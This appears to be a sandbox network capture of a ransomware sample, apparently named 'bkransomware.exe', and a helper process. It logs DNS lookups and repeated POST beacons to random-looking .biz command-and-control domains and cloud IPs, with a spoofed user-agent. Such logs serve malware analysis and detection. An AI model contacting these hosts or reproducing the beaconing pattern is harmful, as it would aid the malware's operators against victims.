accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D2F13F4C610E448BB976615777AE19E8 Ref B: LON04EDGE0921 Ref C: 2024-08-10T02:41:19Z
date: Sat, 10 Aug 2024 02:41:18 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301343_1I707L3L7BW4II7PP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239317301343_1I707L3L7BW4II7PP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 305259
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C5DA0627AEF94DDDB8EC946B39908C6E Ref B: LON04EDGE0921 Ref C: 2024-08-10T02:41:19Z
date: Sat, 10 Aug 2024 02:41:18 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360615986_1M5N6Y5ACPFWCCI4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360615986_1M5N6Y5ACPFWCCI4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 675336
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 63C1C7E622CD4A0E90B2247464A3AD43 Ref B: LON04EDGE0921 Ref C: 2024-08-10T02:41:19Z
date: Sat, 10 Aug 2024 02:41:18 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301173_11CL6NTG6CSIMT5HR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239317301173_11CL6NTG6CSIMT5HR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 830618
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DB960B57534E44779EADDBF526F707C9 Ref B: LON04EDGE0921 Ref C: 2024-08-10T02:41:19Z
date: Sat, 10 Aug 2024 02:41:18 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300910_1N1UYW7VSBMF6PTRK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239317300910_1N1UYW7VSBMF6PTRK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 771656
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FD5A14BEA5AC4E319475BDF742811D05 Ref B: LON04EDGE0921 Ref C: 2024-08-10T02:41:19Z
date: Sat, 10 Aug 2024 02:41:18 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360615987_16QLWX2YIZJRGGD7R&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360615987_16QLWX2YIZJRGGD7R&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 258855
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 38CF301CCE3B4D5EBFC7E0B56789FD2C Ref B: LON04EDGE0921 Ref C: 2024-08-10T02:41:20Z
date: Sat, 10 Aug 2024 02:41:19 GMT
DNS

sxmiywsfv.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

sxmiywsfv.biz

IN A

Response

sxmiywsfv.biz

IN A

13.251.16.150
POST

http://sxmiywsfv.biz/yn

alg.exe

Remote address:

13.251.16.150:80

Request

POST /yn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=313c17275964aad7a6dee4169a6ac9e0|194.110.13.70|1723257680|1723257680|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sxmiywsfv.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

sxmiywsfv.biz

IN A

Response

sxmiywsfv.biz

IN A

13.251.16.150
POST

http://sxmiywsfv.biz/yvitagnvklbvbe

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /yvitagnvklbvbe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=676d70b5ab570a267cd31ce52aa64af2|194.110.13.70|1723257680|1723257680|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vrrazpdh.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vrrazpdh.biz

IN A

Response

vrrazpdh.biz

IN A

34.211.97.45
POST

http://vrrazpdh.biz/wpaskfaew

alg.exe

Remote address:

34.211.97.45:80

Request

POST /wpaskfaew HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4af4296e3cd300f13826e12c16c33468|194.110.13.70|1723257680|1723257680|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ftxlah.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ftxlah.biz

IN A

Response

ftxlah.biz

IN A

47.129.31.212
POST

http://ftxlah.biz/gloqsmdx

alg.exe

Remote address:

47.129.31.212:80

Request

POST /gloqsmdx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=271e40809cfe580cfc6d544eeba6edcd|194.110.13.70|1723257681|1723257681|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

typgfhb.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

typgfhb.biz

IN A

Response

typgfhb.biz

IN A

13.251.16.150
POST

http://typgfhb.biz/vu

alg.exe

Remote address:

13.251.16.150:80

Request

POST /vu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2893917d7fd499f0ef9a6cfbfef8588a|194.110.13.70|1723257682|1723257682|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

esuzf.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

esuzf.biz

IN A

Response

esuzf.biz

IN A

34.211.97.45
POST

http://esuzf.biz/toykljwnn

alg.exe

Remote address:

34.211.97.45:80

Request

POST /toykljwnn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bf0a1bbaaf452c402efcc262f8b517c7|194.110.13.70|1723257683|1723257683|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gvijgjwkh.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gvijgjwkh.biz

IN A

Response

gvijgjwkh.biz

IN A

3.94.10.34
DNS

vrrazpdh.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vrrazpdh.biz

IN A

Response

vrrazpdh.biz

IN A

34.211.97.45
POST

http://gvijgjwkh.biz/rrslewr

alg.exe

Remote address:

3.94.10.34:80

Request

POST /rrslewr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2f4a1e9d751c01c0a3915fb7cb143e03|194.110.13.70|1723257683|1723257683|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://vrrazpdh.biz/maqbkeaqcbtkh

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /maqbkeaqcbtkh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=70fb87cd04cd0586a9419d2066a84343|194.110.13.70|1723257684|1723257684|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qpnczch.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qpnczch.biz

IN A

Response

qpnczch.biz

IN A

44.213.104.86
POST

http://qpnczch.biz/w

alg.exe

Remote address:

44.213.104.86:80

Request

POST /w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=333b93ea3634e38f806bb35864480663|194.110.13.70|1723257684|1723257684|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ftxlah.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ftxlah.biz

IN A

Response

ftxlah.biz

IN A

47.129.31.212
DNS

brsua.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

brsua.biz

IN A

Response

brsua.biz

IN A

3.254.94.185
POST

http://ftxlah.biz/vvfyslvjnwdr

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

47.129.31.212:80

Request

POST /vvfyslvjnwdr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dcb484cdf38ffda7dbed66af977f3e60|194.110.13.70|1723257685|1723257685|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://brsua.biz/glcrkrdbxyijyckh

alg.exe

Remote address:

3.254.94.185:80

Request

POST /glcrkrdbxyijyckh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8461552dcebc7a8412d1896f79aa2862|194.110.13.70|1723257684|1723257684|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dlynankz.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

dlynankz.biz

IN A

Response

dlynankz.biz

IN A

85.214.228.140
POST

http://dlynankz.biz/xwjijmwqnuh

alg.exe

Remote address:

85.214.228.140:80

Request

POST /xwjijmwqnuh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 404 Not Found

Server: nginx/1.27.0
Date: Sat, 10 Aug 2024 02:41:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
DNS

185.94.254.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

185.94.254.3.in-addr.arpa

IN PTR

Response

185.94.254.3.in-addr.arpa

IN PTR

ec2-3-254-94-185 eu-west-1compute amazonawscom
DNS

oflybfv.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

oflybfv.biz

IN A

Response

oflybfv.biz

IN A

47.129.31.212
POST

http://oflybfv.biz/ywmi

alg.exe

Remote address:

47.129.31.212:80

Request

POST /ywmi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e4cd57c8c4d8b6fb026694c48b463116|194.110.13.70|1723257685|1723257685|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

typgfhb.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

typgfhb.biz

IN A

Response

typgfhb.biz

IN A

13.251.16.150
POST

http://typgfhb.biz/egctlpn

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /egctlpn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8a85d78e503336ced777733a3640e252|194.110.13.70|1723257686|1723257686|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

140.228.214.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.228.214.85.in-addr.arpa

IN PTR

Response

140.228.214.85.in-addr.arpa

IN PTR

h2758763stratoservernet
DNS

yhqqc.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yhqqc.biz

IN A

Response

yhqqc.biz

IN A

34.211.97.45
POST

http://yhqqc.biz/salhskahvruvrcuv

alg.exe

Remote address:

34.211.97.45:80

Request

POST /salhskahvruvrcuv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=96f477951e9ba9594e8f30c2b1b85540|194.110.13.70|1723257686|1723257686|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

esuzf.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

esuzf.biz

IN A

Response

esuzf.biz

IN A

34.211.97.45
POST

http://esuzf.biz/sp

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /sp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b0c36a5f785fcc2f725539ab2678ba9f|194.110.13.70|1723257686|1723257686|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mnjmhp.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

47.129.31.212
POST

http://mnjmhp.biz/cvafbqvshgednjeh

alg.exe

Remote address:

47.129.31.212:80

Request

POST /cvafbqvshgednjeh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ed9716cef6930359595453c3ed09549a|194.110.13.70|1723257687|1723257687|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
